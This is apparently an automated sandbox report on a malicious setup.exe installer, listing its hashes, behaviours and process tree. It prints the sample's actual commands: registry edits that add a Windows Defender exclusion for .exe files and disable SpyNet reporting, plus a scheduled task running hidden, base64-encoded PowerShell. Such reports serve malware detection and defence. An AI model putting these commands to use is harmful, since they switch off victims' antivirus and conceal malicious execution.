Analysis
-
max time kernel
25s -
max time network
21s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2023 05:26
Static task
static1
Behavioral task
behavioral1
Sample
setup.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
setup.exe
Resource
win10v2004-20230915-en
General
-
Target
setup.exe
-
Size
7.2MB
-
MD5
e1f41a1d78614945b44e648155a13778
-
SHA1
d67ab2ac2f31a7fc778b0b5117715e6f0638d90f
-
SHA256
9a55005ab12529cde78752fd23476d0440d31247449ec86999b554f08f9b8469
-
SHA512
f70bf4a109ecbb6131d696fd3087c198ed5a4029ba47be0a0fcc2ad0b6bff080a054c8702e3fcf178f901605a23a4e570f8cba73a79234b54c723fc68376bfca
-
SSDEEP
196608:91OEbEp2HgtmQhl64gtK8GllcpCiXamcJPd/I:3OPp2HgQ88bKmchd/I
Malware Config
Signatures
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation Install.exe -
Executes dropped EXE 2 IoCs
pid Process 4804 Install.exe 1084 Install.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1080 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5032 powershell.EXE 5032 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5032 powershell.EXE -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 4304 wrote to memory of 4804 4304 setup.exe 87 PID 4304 wrote to memory of 4804 4304 setup.exe 87 PID 4304 wrote to memory of 4804 4304 setup.exe 87 PID 4804 wrote to memory of 1084 4804 Install.exe 89 PID 4804 wrote to memory of 1084 4804 Install.exe 89 PID 4804 wrote to memory of 1084 4804 Install.exe 89 PID 1084 wrote to memory of 2716 1084 Install.exe 94 PID 1084 wrote to memory of 2716 1084 Install.exe 94 PID 1084 wrote to memory of 2716 1084 Install.exe 94 PID 1084 wrote to memory of 1936 1084 Install.exe 96 PID 1084 wrote to memory of 1936 1084 Install.exe 96 PID 1084 wrote to memory of 1936 1084 Install.exe 96 PID 2716 wrote to memory of 1944 2716 forfiles.exe 98 PID 2716 wrote to memory of 1944 2716 forfiles.exe 98 PID 2716 wrote to memory of 1944 2716 forfiles.exe 98 PID 1936 wrote to memory of 3636 1936 forfiles.exe 99 PID 1936 wrote to memory of 3636 1936 forfiles.exe 99 PID 1936 wrote to memory of 3636 1936 forfiles.exe 99 PID 1944 wrote to memory of 2980 1944 cmd.exe 101 PID 1944 wrote to memory of 2980 1944 cmd.exe 101 PID 1944 wrote to memory of 2980 1944 cmd.exe 101 PID 3636 wrote to memory of 4092 3636 cmd.exe 100 PID 3636 wrote to memory of 4092 3636 cmd.exe 100 PID 3636 wrote to memory of 4092 3636 cmd.exe 100 PID 1944 wrote to memory of 4992 1944 cmd.exe 104 PID 1944 wrote to memory of 4992 1944 cmd.exe 104 PID 1944 wrote to memory of 4992 1944 cmd.exe 104 PID 3636 wrote to memory of 2388 3636 cmd.exe 102 PID 3636 wrote to memory of 2388 3636 cmd.exe 102 PID 3636 wrote to memory of 2388 3636 cmd.exe 102 PID 1084 wrote to memory of 1080 1084 Install.exe 105 PID 1084 wrote to memory of 1080 1084 Install.exe 105 PID 1084 wrote to memory of 1080 1084 Install.exe 105 PID 1084 wrote to memory of 4152 1084 Install.exe 107 PID 1084 wrote to memory of 4152 1084 Install.exe 107 PID 1084 wrote to memory of 4152 1084 Install.exe 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Users\Admin\AppData\Local\Temp\7zS8B0A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Users\Admin\AppData\Local\Temp\7zS8C81.tmp\Install.exe.\Install.exe /GKFdidhT "385118" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1084 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2980
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4992
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4092
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2388
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsyXpPNPd" /SC once /ST 08:21:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsyXpPNPd"4⤵PID:4152
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5032
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.1MB
MD5a14caa716ad3b5477fbec3dbe26f7cc9
SHA11f8b4128fdd458c8ec85430d76f340b5e9e26482
SHA256e868014e9d327369e9c0e353a95b9dd75871e5f1365fe8ef3d022bcc8ff43af6
SHA51230c1aea5892c316e4a7d11e79d8894fe851e9d5e83485da62a22ed2f99e18c952a9576cfc2d250011f4089d91b583a9045883bf5204b1e48fc0d6f7562b25837
-
Filesize
6.1MB
MD5a14caa716ad3b5477fbec3dbe26f7cc9
SHA11f8b4128fdd458c8ec85430d76f340b5e9e26482
SHA256e868014e9d327369e9c0e353a95b9dd75871e5f1365fe8ef3d022bcc8ff43af6
SHA51230c1aea5892c316e4a7d11e79d8894fe851e9d5e83485da62a22ed2f99e18c952a9576cfc2d250011f4089d91b583a9045883bf5204b1e48fc0d6f7562b25837
-
Filesize
6.9MB
MD5425cca2e32d9e1fb26c90c9d32632aa6
SHA121753ce79cbc01184a24e3a2f2cac65da4ab6bc4
SHA256694196c368ad76dde9fc94d4bf57df4697c05006a59591112dba5638ac1a0ec4
SHA5122b08593fd7e195bdef4a23033e1ba86c5480f9ec6acc34a5b8fa9988e195a4e466c20625084a34d9a070362943d3e31239494761f9285996be5f42466f6a7384
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82